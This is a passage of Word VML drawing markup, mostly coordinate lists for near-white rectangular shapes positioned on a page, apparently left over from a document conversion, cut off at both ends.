94,4949,10694,4948,10694,4946,10694,4945,10694,4944,10694,4943,10694,4941,10694,4940,10694,4939,10694,4937,10694,4936,10694,4934,10694,4933,10694,4931,10694,4930,10694,4928,10694,4926,10694,4925,10694,4923,10694,4921,10694,4919,10694,4917,10694,4915,10694,4913,10694,4911,10694,4909,10694,4907,10694,4905,10694,4903,10694,4901,10694,4899,10694,4896,10694,4894,10694,4892,10694,4889,10694,4887,10694,4884,10694,4882,10694,4879,10694,4876,10694,4874,10694,4871,10694,4868,10694,4865,10694,4862,10694,4859,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10693,4856,10693,4856,10693,4856,10693,4856,10693,4856,10692,4856,10692,4856,10692,4856,10691,4856,10691,4856,10691,4856,10690,4856,10690,4856,10689,4856,10689,4856,10688,4856,10688,4856,10687,4856,10687,4856,10686,4856,10685,4856,10685,4856,10684,4856,10683,4856,10682,4856,10681,4856,10681,4856,10680,4856,10679,4856,10678,4856,10677,4856,10675,4856,10674,4856,10673,4856,10672,4856,10671,4856,10669,4856,10668,4856,10666,4856,10665,4856,10663,4856,10662,4856,10660,4856,10658,4856,10657,4856,10655,4856,10653,4856,10651,4856,10649,4856,10647,4856,10645,4856,10642,4856,10640,4856,10638,4856,10635,4856,10633,4856,10631,4856,10628,4856,10625,4856,10623,4856,10620,4856,10617,4856,10614,4856,10611,4856,10608,4856,10605,4856,10601,4856,10598,4856,10595,4856,10591,4856,10588,4856,10584,4856,10580,4856,10576,4856,10573,4856,10569,4856,10565,4856,10560,4856,10556,4856,10552,4856,10547,4856,10543,4856,10538,4856,10534,4856,10529,4856,10524,4856,10519,4856,10514,4856,10509,4856,10504,4856,10498,4856,10493,4856,10487,4856,10482,4856,10476,4856,10470,4856,10464,4856,10458,4856,10452,4856,10446,4856,10439e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:539.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,10790" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:10790;width:130;height:270" coordorigin="2070,10790" coordsize="130,270" path="m2095,10814l2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2095,10814,2096,10814,2096,10814,2096,10814,2096,10814,2096,10814,2096,10814,2096,10814,2096,10814,2096,10814,2097,10814,2097,10814,2097,10814,2097,10814,2097,10814,2098,10814,2098,10814,2098,10814,2098,10814,2099,10814,2099,10814,2099,10814,2100,10814,2100,10814,2100,10814,2101,10814,2101,10814,2102,10814,2102,10814,2102,10814,2103,10814,2103,10814,2104,10814,2105,10814,2105,10814,2106,10814,2106,10814,2107,10814,2108,10814,2108,10814,2109,10814,2110,10814,2110,10814,2111,10814,2112,10814,2113,10814,2114,10814,2115,10814,2116,10814,2116,10814,2117,10814,2118,10814,2119,10814,2121,10814,2122,10814,2123,10814,2124,10814,2125,10814,2126,10814,2128,10814,2129,10814,2130,10814,2132,10814,2133,10814,2134,10814,2136,10814,2137,10814,2139,10814,2140,10814,2142,10814,2144,10814,2145,10814,2147,10814,2149,10814,2151,10814,2152,10814,2154,10814,2156,10814,2158,10814,2160,10814,2162,10814,2164,10814,2166,10814,2168,10814,2171,10814,2173,10814,2175,10814,2178,10814,2180,10814,2182,10814,2185,10814,2187,10814,2190,10814,2192,10814,2195,10814,2198,10814,2201,10814,2203,10814,2206,10814,2209,10814,2212,10814,2215,10814,2215,10814,2215,10814,2215,10814,2215,10814,2215,10814,2215,10814,2215,10814,2215,10815,2215,10815,2215,10815,2215,10815,2215,10815,2215,10815,2215,10815,2215,10815,2215,10815,2215,10815,2215,10815,2215,10815,2215,10815,2215,10816,2215,10816,2215,10816,2215,10816,2215,10817,2215,10817,2215,10817,2215,10817,2215,10818,2215,10818,2215,10819,2215,10819,2215,10819,2215,10820,2215,10820,2215,10821,2215,10822,2215,10822,2215,10823,2215,10823,2215,10824,2215,10825,2215,10826,2215,10826,2215,10827,2215,10828,2215,10829,2215,10830,2215,10831,2215,10832,2215,10833,2215,10835,2215,10836,2215,10837,2215,10838,2215,10840,2215,10841,2215,10842,2215,10844,2215,10846,2215,10847,2215,10849,2215,10851,2215,10852,2215,10854,2215,10856,2215,10858,2215,10860,2215,10862,2215,10864,2215,10866,2215,10869,2215,10871,2215,10873,2215,10876,2215,10878,2215,10881,2215,10884,2215,10886,2215,10889,2215,10892,2215,10895,2215,10898,2215,10901,2215,10904,2215,10907,2215,10911,2215,10914,2215,10918,2215,10921,2215,10925,2215,10929,2215,10932,2215,10936,2215,10940,2215,10944,2215,10948,2215,10953,2215,10957,2215,10961,2215,10966,2215,10970,2215,10975,2215,10980,2215,10985,2215,10990,2215,10995,2215,11000,2215,11005,2215,11011,2215,11016,2215,11022,2215,11027,2215,11033,2215,11039,2215,11045,2215,11051,2215,11057,2215,11063,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2215,11070,2214,11070,2214,11070,2214,11070,2214,11070,2214,11070,2214,11070,2214,11070,2214,11070,2213,11070,2213,11070,2213,11070,2213,11070,2213,11070,2212,11070,2212,11070,2212,11070,2212,11070,2211,11070,2211,11070,2211,11070,2210,11070,2210,11070,2209,11070,2209,11070,2209,11070,2208,11070,2208,11070,2207,11070,2207,11070,2206,11070,2206,11070,2205,11070,2205,11070,2204,11070,2203,11070,2203,11070,2202,11070,2201,11070,2200,11070,2200,11070,2199,11070,2198,11070,2197,11070,2196,11070,2196,11070,2195,11070,2194,11070,2193,11070,2192,11070,2191,11070,2190,11070,2189,11070,2187,11070,2186,11070,2185,11070,2184,11070,2183,11070,2181,11070,2180,11070,2179,11070,2177,11070,2176,11070,2174,11070,2173,11070,2171,11070,2170,11070,2168,11070,2167,11070,2165,11070,2163,11070,2161,11070,2160,11070,2158,11070,2156,11070,2154,11070,2152,11070,2150,11070,2148,11070,2146,11070,2144,11070,2142,11070,2140,11070,2137,11070,2135,11070,2133,11070,2130,11070,2128,11070,2125,11070,2123,11070,2120,11070,2118,11070,2115,11070,2112,11070,2110,11070,2107,11070,2104,11070,2101,11070,2098,11070,2095,11070,2095,11070,2095,11070,2095,11070,2095,11070,2095,11070,2095,11070,2095,11070,2095,11070,2095,11070,2095,11069,2095,11069,2095,11069,2095,11069,2095,11069,2095,11069,2095,11069,2095,11069,2095,11069,2095,11069,2095,11069,2095,11068,2095,11068,2095,11068,2095,11068,2095,11067,2095,11067,2095,11067,2095,11067,2095,11066,2095,11066,2095,11065,2095,11065,2095,11065,2095,11064,2095,11064,2095,11063,2095,11063,2095,11062,2095,11061,2095,11061,2095,11060,2095,11059,2095,11058,2095,11058,2095,11057,2095,11056,2095,11055,2095,11054,2095,11053,2095,11052,2095,11051,2095,11049,2095,11048,2095,11047,2095,11046,2095,11044,2095,11043,2095,11042,2095,11040,2095,11038,2095,11037,2095,11035,2095,11033,2095,11032,2095,11030,2095,11028,2095,11026,2095,11024,2095,11022,2095,11020,2095,11018,2095,11015,2095,11013,2095,11011,2095,11008,2095,11006,2095,11003,2095,11000,2095,10998,2095,10995,2095,10992,2095,10989,2095,10986,2095,10983,2095,10980,2095,10977,2095,10973,2095,10970,2095,10966,2095,10963,2095,10959,2095,10955,2095,10952,2095,10948,2095,10944,2095,10940,2095,10936,2095,10931,2095,10927,2095,10923,2095,10918,2095,10914,2095,10909,2095,10904,2095,10899,2095,10894,2095,10889,2095,10884,2095,10879,2095,10874,2095,10868,2095,10863,2095,10857,2095,10851,2095,10845,2095,10839,2095,10833,2095,10827,2095,10821,2095,10814e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:557.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,11150" coordsize="250,270">
        <v:shape style="position:absolute;left:1950;top:11150;width:250;height:270" coordorigin="1950,11150" coordsize="250,270" path="m1975,11175l1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1975,11175,1976,11175,1976,11175,1976,11175,1976,11175,1976,11175,1976,11175,1977,11175,1977,11175,1977,11175,1977,11175,1977,11175,1978,11175,1978,11175,1978,11175,1979,11175,1979,11175,1980,11175,1980,11175,1981,11175,1981,11175,1982,11175,1982,11175,1983,11175,1983,11175,1984,11175,1985,11175,1986,11175,1986,11175,1987,11175,1988,11175,1989,11175,1990,11175,1991,11175,1992,11175,1993,11175,1994,11175,1995,11175,1996,11175,1997,11175,1999,11175,2000,11175,2001,11175,2003,11175,2004,11175,2006,11175,2007,11175,2009,11175,2011,11175,2012,11175,2014,11175,2016,11175,2018,11175,2020,11175,2022,11175,2024,11175,2026,11175,2028,11175,2030,11175,2033,11175,2035,11175,2038,11175,2040,11175,2043,11175,2045,11175,2048,11175,2051,11175,2054,11175,2056,11175,2059,11175,2063,11175,2066,11175,2069,11175,2072,11175,2075,11175,2079,11175,2082,11175,2086,11175,2090,11175,2093,11175,2097,11175,2101,11175,2105,11175,2109,11175,2113,11175,2117,11175,2122,11175,2126,11175,2131,11175,2135,11175,2140,11175,2145,11175,2150,11175,2154,11175,2160,11175,2165,11175,2170,11175,2175,11175,2181,11175,2186,11175,2192,11175,2197,11175,2203,11175,2209,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11175,2215,11176,2215,11176,2215,11176,2215,11176,2215,11176,2215,11176,2215,11177,2215,11177,2215,11177,2215,11178,2215,11178,2215,11178,2215,11179,2215,11179,2215,11180,2215,11180,2215,11181,2215,11181,2215,11182,2215,11182,2215,11183,2215,11184,2215,11184,2215,11185,2215,11186,2215,11187,2215,11188,2215,11188,2215,11189,2215,11190,2215,11191,2215,11192,2215,11194,2215,11195,2215,11196,2215,11197,2215,11198,2215,11200,2215,11201,2215,11203,2215,11204,2215,11206,2215,11207,2215,11209,2215,11211,2215,11212,2215,11214,2215,11216,2215,11218,2215,11220,2215,11222,2215,11224,2215,11227,2215,11229,2215,11231,2215,11234,2215,11236,2215,11239,2215,11241,2215,11244,2215,11246,2215,11249,2215,11252,2215,11255,2215,11258,2215,11261,2215,11264,2215,11268,2215,11271,2215,11274,2215,11278,2215,11281,2215,11285,2215,11289,2215,11293,2215,11296,2215,11300,2215,11304,2215,11309,2215,11313,2215,11317,2215,11322,2215,11326,2215,11331,2215,11335,2215,11340,2215,11345,2215,11350,2215,11355,2215,11360,2215,11365,2215,11371,2215,11376,2215,11382,2215,11387,2215,11393,2215,11399,2215,11405,2215,11411,2215,11417,2215,11423,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2215,11430,2214,11430,2214,11430,2214,11430,2214,11430,2214,11430,2214,11430,2213,11430,2213,11430,2213,11430,2213,11430,2212,11430,2212,11430,2212,11430,2211,11430,2211,11430,2210,11430,2210,11430,2210,11430,2209,11430,2208,11430,2208,11430,2207,11430,2207,11430,2206,11430,2205,11430,2205,11430,2204,11430,2203,11430,2202,11430,2201,11430,2200,11430,2199,11430,2198,11430,2197,11430,2196,11430,2195,11430,2194,11430,2193,11430,2191,11430,2190,11430,2189,11430,2187,11430,2186,11430,2184,11430,2183,11430,2181,11430,2179,11430,2178,11430,2176,11430,2174,11430,2172,11430,2170,11430,2168,11430,2166,11430,2164,11430,2162,11430,2160,11430,2157,11430,2155,11430,2153,11430,2150,11430,2147,11430,2145,11430,2142,11430,2139,11430,2137,11430,2134,11430,2131,11430,2128,11430,2124,11430,2121,11430,2118,11430,2115,11430,2111,11430,2108,11430,2104,11430,2101,11430,2097,11430,2093,11430,2089,11430,2085,11430,2081,11430,2077,11430,2073,11430,2068,11430,2064,11430,2059,11430,2055,11430,2050,11430,2045,11430,2041,11430,2036,11430,2031,11430,2025,11430,2020,11430,2015,11430,2010,11430,2004,11430,1998,11430,1993,11430,1987,11430,1981,11430,1975,11430,1975,11430,1975,11430,1975,11430,1975,11430,1975,11430,1975,11430,1975,11430,1975,11430,1975,11430,1975,11430,1975,11430,1975,11430,1975,11429,1975,11429,1975,11429,1975,11429,1975,11429,1975,11429,1975,11429,1975,11429,1975,11429,1975,11428,1975,11428,1975,11428,1975,11428,1975,11427,1975,11427,1975,11427,1975,11426,1975,11426,1975,11426,1975,11425,1975,11425,1975,11424,1975,11424,1975,11423,1975,11423,1975,11422,1975,11421,1975,11421,1975,11420,1975,11419,1975,11419,1975,11418,1975,11417,1975,11416,1975,11415,1975,11414,1975,11413,1975,11412,1975,11411,1975,11410,1975,11408,1975,11407,1975,11406,1975,11405,1975,11403,1975,11402,1975,11400,1975,11399,1975,11397,1975,11395,1975,11394,1975,11392,1975,11390,1975,11388,1975,11386,1975,11384,1975,11382,1975,11380,1975,11378,1975,11376,1975,11373,1975,11371,1975,11368,1975,11366,1975,11363,1975,11361,1975,11358,1975,11355,1975,11352,1975,11349,1975,11346,1975,11343,1975,11340,1975,11337,1975,11333,1975,11330,1975,11327,1975,11323,1975,11319,1975,11316,1975,11312,1975,11308,1975,11304,1975,11300,1975,11296,1975,11292,1975,11287,1975,11283,1975,11278,1975,11274,1975,11269,1975,11264,1975,11259,1975,11254,1975,11249,1975,11244,1975,11239,1975,11234,1975,11228,1975,11223,1975,11217,1975,11211,1975,11205,1975,11200,1975,11193,1975,11187,1975,11181,1975,11175e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:102.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2050,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:2050;top:11890;width:130;height:270" coordorigin="2050,11890" coordsize="130,270" path="m2065,11910l2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2065,11910,2066,11910,2066,11910,2066,11910,2066,11910,2066,11910,2066,11910,2066,11910,2066,11910,2066,11910,2067,11910,2067,11910,2067,11910,2067,11910,2067,11910,2068,11910,2068,11910,2068,11910,2068,11910,2069,11910,2069,11910,2069,11910,2070,11910,2070,11910,2070,11910,2071,11910,2071,11910,2072,11910,2072,11910,2072,11910,2073,11910,2073,11910,2074,11910,2074,11910,2075,11910,2076,11910,2076,11910,2077,11910,2078,11910,2078,11910,2079,11910,2080,11910,2080,11910,2081,11910,2082,11910,2083,11910,2084,11910,2085,11910,2086,11910,2086,11910,2087,11910,2088,11910,2089,11910,2091,11910,2092,11910,2093,11910,2094,11910,2095,11910,2096,11910,2098,11910,2099,11910,2100,11910,2102,11910,2103,11910,2104,11910,2106,11910,2107,11910,2109,11910,2110,11910,2112,11910,2114,11910,2115,11910,2117,11910,2119,11910,2121,11910,2122,11910,2124,11910,2126,11910,2128,11910,2130,11910,2132,11910,2134,11910,2136,11910,2138,11910,2141,11910,2143,11910,2145,11910,2148,11910,2150,11910,2152,11910,2155,11910,2157,11910,2160,11910,2162,11910,2165,11910,2168,11910,2171,11910,2173,11910,2176,11910,2179,11910,2182,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11911,2185,11911,2185,11911,2185,11911,2185,11911,2185,11911,2185,11911,2185,11912,2185,11912,2185,11912,2185,11912,2185,11913,2185,11913,2185,11913,2185,11914,2185,11914,2185,11915,2185,11915,2185,11915,2185,11916,2185,11916,2185,11917,2185,11918,2185,11918,2185,11919,2185,11920,2185,11920,2185,11921,2185,11922,2185,11923,2185,11924,2185,11925,2185,11926,2185,11927,2185,11928,2185,11929,2185,11930,2185,11931,2185,11933,2185,11934,2185,11935,2185,11937,2185,11938,2185,11940,2185,11941,2185,11943,2185,11944,2185,11946,2185,11948,2185,11950,2185,11952,2185,11954,2185,11956,2185,11958,2185,11960,2185,11962,2185,11964,2185,11967,2185,11969,2185,11971,2185,11974,2185,11976,2185,11979,2185,11982,2185,11985,2185,11988,2185,11990,2185,11993,2185,11997,2185,12000,2185,12003,2185,12006,2185,12010,2185,12013,2185,12017,2185,12020,2185,12024,2185,12028,2185,12032,2185,12036,2185,12040,2185,12044,2185,12048,2185,12052,2185,12057,2185,12061,2185,12066,2185,12071,2185,12075,2185,12080,2185,12085,2185,12090,2185,12095,2185,12101,2185,12106,2185,12112,2185,12117,2185,12123,2185,12128,2185,12134,2185,12140,2185,12146,2185,12152,2185,12159,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2184,12165,2184,12165,2184,12165,2184,12165,2184,12165,2184,12165,2184,12165,2184,12165,2183,12165,2183,12165,2183,12165,2183,12165,2183,12165,2182,12165,2182,12165,2182,12165,2181,12165,2181,12165,2181,12165,2181,12165,2180,12165,2180,12165,2179,12165,2179,12165,2179,12165,2178,12165,2178,12165,2177,12165,2177,12165,2176,12165,2176,12165,2175,12165,2174,12165,2174,12165,2173,12165,2173,12165,2172,12165,2171,12165,2170,12165,2170,12165,2169,12165,2168,12165,2167,12165,2166,12165,2166,12165,2165,12165,2164,12165,2163,12165,2162,12165,2161,12165,2160,12165,2159,12165,2157,12165,2156,12165,2155,12165,2154,12165,2153,12165,2151,12165,2150,12165,2149,12165,2147,12165,2146,12165,2144,12165,2143,12165,2141,12165,2140,12165,2138,12165,2137,12165,2135,12165,2133,12165,2131,12165,2130,12165,2128,12165,2126,12165,2124,12165,2122,12165,2120,12165,2118,12165,2116,12165,2114,12165,2112,12165,2109,12165,2107,12165,2105,12165,2103,12165,2100,12165,2098,12165,2095,12165,2093,12165,2090,12165,2088,12165,2085,12165,2082,12165,2080,12165,2077,12165,2074,12165,2071,12165,2068,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12165,2065,12164,2065,12164,2065,12164,2065,12164,2065,12164,2065,12164,2065,12163,2065,12163,2065,12163,2065,12162,2065,12162,2065,12162,2065,12161,2065,12161,2065,12161,2065,12160,2065,12160,2065,12159,2065,12159,2065,12158,2065,12157,2065,12157,2065,12156,2065,12155,2065,12155,2065,12154,2065,12153,2065,12152,2065,12151,2065,12150,2065,12149,2065,12148,2065,12147,2065,12146,2065,12145,2065,12144,2065,12143,2065,12141,2065,12140,2065,12139,2065,12137,2065,12136,2065,12134,2065,12132,2065,12131,2065,12129,2065,12127,2065,12125,2065,12124,2065,12122,2065,12120,2065,12118,2065,12115,2065,12113,2065,12111,2065,12109,2065,12106,2065,12104,2065,12101,2065,12099,2065,12096,2065,12093,2065,12090,2065,12088,2065,12085,2065,12082,2065,12079,2065,12075,2065,12072,2065,12069,2065,12065,2065,12062,2065,12058,2065,12055,2065,12051,2065,12047,2065,12043,2065,12039,2065,12035,2065,12031,2065,12027,2065,12023,2065,12018,2065,12014,2065,12009,2065,12004,2065,12000,2065,11995,2065,11990,2065,11985,2065,11980,2065,11974,2065,11969,2065,11964,2065,11958,2065,11952,2065,11947,2065,11941,2065,11935,2065,11929,2065,11923,2065,11916,2065,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:11890;width:130;height:270" coordorigin="2170,11890" coordsize="130,270" path="m2185,11910l2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2185,11910,2186,11910,2186,11910,2186,11910,2186,11910,2186,11910,2186,11910,2186,11910,2186,11910,2186,11910,2187,11910,2187,11910,2187,11910,2187,11910,2187,11910,2187,11910,2188,11910,2188,11910,2188,11910,2188,11910,2189,11910,2189,11910,2189,11910,2190,11910,2190,11910,2190,11910,2191,11910,2191,11910,2192,11910,2192,11910,2192,11910,2193,11910,2193,11910,2194,11910,2195,11910,2195,11910,2196,11910,2196,11910,2197,11910,2198,11910,2198,11910,2199,11910,2200,11910,2200,11910,2201,11910,2202,11910,2203,11910,2204,11910,2205,11910,2206,11910,2207,11910,2208,11910,2209,11910,2210,11910,2211,11910,2212,11910,2213,11910,2214,11910,2215,11910,2216,11910,2218,11910,2219,11910,2220,11910,2222,11910,2223,11910,2224,11910,2226,11910,2227,11910,2229,11910,2230,11910,2232,11910,2234,11910,2235,11910,2237,11910,2239,11910,2241,11910,2242,11910,2244,11910,2246,11910,2248,11910,2250,11910,2252,11910,2254,11910,2256,11910,2259,11910,2261,11910,2263,11910,2265,11910,2268,11910,2270,11910,2272,11910,2275,11910,2277,11910,2280,11910,2283,11910,2285,11910,2288,11910,2291,11910,2293,11910,2296,11910,2299,11910,2302,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11911,2305,11911,2305,11911,2305,11911,2305,11911,2305,11911,2305,11911,2305,11912,2305,11912,2305,11912,2305,11912,2305,11913,2305,11913,2305,11913,2305,11914,2305,11914,2305,11915,2305,11915,2305,11915,2305,11916,2305,11916,2305,11917,2305,11918,2305,11918,2305,11919,2305,11920,2305,11920,2305,11921,2305,11922,2305,11923,2305,11924,2305,11925,2305,11926,2305,11927,2305,11928,2305,11929,2305,11930,2305,11931,2305,11933,2305,11934,2305,11935,2305,11937,2305,11938,2305,11940,2305,11941,2305,11943,2305,11944,2305,11946,2305,11948,2305,11950,2305,11952,2305,11954,2305,11956,2305,11958,2305,11960,2305,11962,2305,11964,2305,11967,2305,11969,2305,11971,2305,11974,2305,11976,2305,11979,2305,11982,2305,11985,2305,11988,2305,11990,2305,11993,2305,11997,2305,12000,2305,12003,2305,12006,2305,12010,2305,12013,2305,12017,2305,12020,2305,12024,2305,12028,2305,12032,2305,12036,2305,12040,2305,12044,2305,12048,2305,12052,2305,12057,2305,12061,2305,12066,2305,12071,2305,12075,2305,12080,2305,12085,2305,12090,2305,12095,2305,12101,2305,12106,2305,12112,2305,12117,2305,12123,2305,12128,2305,12134,2305,12140,2305,12146,2305,12152,2305,12159,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2305,12165,2304,12165,2304,12165,2304,12165,2304,12165,2304,12165,2304,12165,2304,12165,2303,12165,2303,12165,2303,12165,2303,12165,2303,12165,2302,12165,2302,12165,2302,12165,2302,12165,2301,12165,2301,12165,2301,12165,2300,12165,2300,12165,2299,12165,2299,12165,2299,12165,2298,12165,2298,12165,2297,12165,2297,12165,2296,12165,2296,12165,2295,12165,2295,12165,2294,12165,2293,12165,2293,12165,2292,12165,2291,12165,2291,12165,2290,12165,2289,12165,2288,12165,2287,12165,2286,12165,2286,12165,2285,12165,2284,12165,2283,12165,2282,12165,2281,12165,2280,12165,2279,12165,2277,12165,2276,12165,2275,12165,2274,12165,2273,12165,2271,12165,2270,12165,2269,12165,2267,12165,2266,12165,2264,12165,2263,12165,2261,12165,2260,12165,2258,12165,2257,12165,2255,12165,2253,12165,2251,12165,2250,12165,2248,12165,2246,12165,2244,12165,2242,12165,2240,12165,2238,12165,2236,12165,2234,12165,2232,12165,2230,12165,2227,12165,2225,12165,2223,12165,2220,12165,2218,12165,2215,12165,2213,12165,2210,12165,2208,12165,2205,12165,2202,12165,2200,12165,2197,12165,2194,12165,2191,12165,2188,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12165,2185,12164,2185,12164,2185,12164,2185,12164,2185,12164,2185,12164,2185,12163,2185,12163,2185,12163,2185,12162,2185,12162,2185,12162,2185,12161,2185,12161,2185,12161,2185,12160,2185,12160,2185,12159,2185,12159,2185,12158,2185,12157,2185,12157,2185,12156,2185,12155,2185,12155,2185,12154,2185,12153,2185,12152,2185,12151,2185,12150,2185,12149,2185,12148,2185,12147,2185,12146,2185,12145,2185,12144,2185,12143,2185,12141,2185,12140,2185,12139,2185,12137,2185,12136,2185,12134,2185,12132,2185,12131,2185,12129,2185,12127,2185,12125,2185,12124,2185,12122,2185,12120,2185,12118,2185,12115,2185,12113,2185,12111,2185,12109,2185,12106,2185,12104,2185,12101,2185,12099,2185,12096,2185,12093,2185,12090,2185,12088,2185,12085,2185,12082,2185,12079,2185,12075,2185,12072,2185,12069,2185,12065,2185,12062,2185,12058,2185,12055,2185,12051,2185,12047,2185,12043,2185,12039,2185,12035,2185,12031,2185,12027,2185,12023,2185,12018,2185,12014,2185,12009,2185,12004,2185,12000,2185,11995,2185,11990,2185,11985,2185,11980,2185,11974,2185,11969,2185,11964,2185,11958,2185,11952,2185,11947,2185,11941,2185,11935,2185,11929,2185,11923,2185,11916,2185,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:11890;width:130;height:270" coordorigin="2290,11890" coordsize="130,270" path="m2305,11910l2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2305,11910,2306,11910,2306,11910,2306,11910,2306,11910,2306,11910,2306,11910,2306,11910,2306,11910,2306,11910,2306,11910,2307,11910,2307,11910,2307,11910,2307,11910,2307,11910,2307,11910,2308,11910,2308,11910,2308,11910,2308,11910,2309,11910,2309,11910,2309,11910,2310,11910,2310,11910,2310,11910,2311,11910,2311,11910,2312,11910,2312,11910,2313,11910,2313,11910,2314,11910,2314,11910,2315,11910,2315,11910,2316,11910,2316,11910,2317,11910,2318,11910,2318,11910,2319,11910,2320,11910,2321,11910,2321,11910,2322,11910,2323,11910,2324,11910,2325,11910,2326,11910,2327,11910,2328,11910,2329,11910,2330,11910,2331,11910,2332,11910,2333,11910,2334,11910,2335,11910,2336,11910,2338,11910,2339,11910,2340,11910,2342,11910,2343,11910,2344,11910,2346,11910,2347,11910,2349,11910,2350,11910,2352,11910,2354,11910,2355,11910,2357,11910,2359,11910,2361,11910,2362,11910,2364,11910,2366,11910,2368,11910,2370,11910,2372,11910,2374,11910,2376,11910,2379,11910,2381,11910,2383,11910,2385,11910,2388,11910,2390,11910,2392,11910,2395,11910,2397,11910,2400,11910,2403,11910,2405,11910,2408,11910,2411,11910,2414,11910,2416,11910,2419,11910,2422,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11910,2425,11911,2425,11911,2425,11911,2425,11911,2425,11911,2425,11911,2425,11911,2425,11912,2425,11912,2425,11912,2425,11912,2425,11913,2425,11913,2425,11913,2425,11914,2425,11914,2425,11915,2425,11915,2425,11915,2425,11916,2425,11916,2425,11917,2425,11918,2425,11918,2425,11919,2425,11920,2425,11920,2425,11921,2425,11922,2425,11923,2425,11924,2425,11925,2425,11926,2425,11927,2425,11928,2425,11929,2425,11930,2425,11931,2425,11933,2425,11934,2425,11935,2425,11937,2425,11938,2425,11940,2425,11941,2425,11943,2425,11944,2425,11946,2425,11948,2425,11950,2425,11952,2425,11954,2425,11956,2425,11958,2425,11960,2425,11962,2425,11964,2425,11967,2425,11969,2425,11971,2425,11974,2425,11976,2425,11979,2425,11982,2425,11985,2425,11988,2425,11990,2425,11993,2425,11997,2425,12000,2425,12003,2425,12006,2425,12010,2425,12013,2425,12017,2425,12020,2425,12024,2425,12028,2425,12032,2425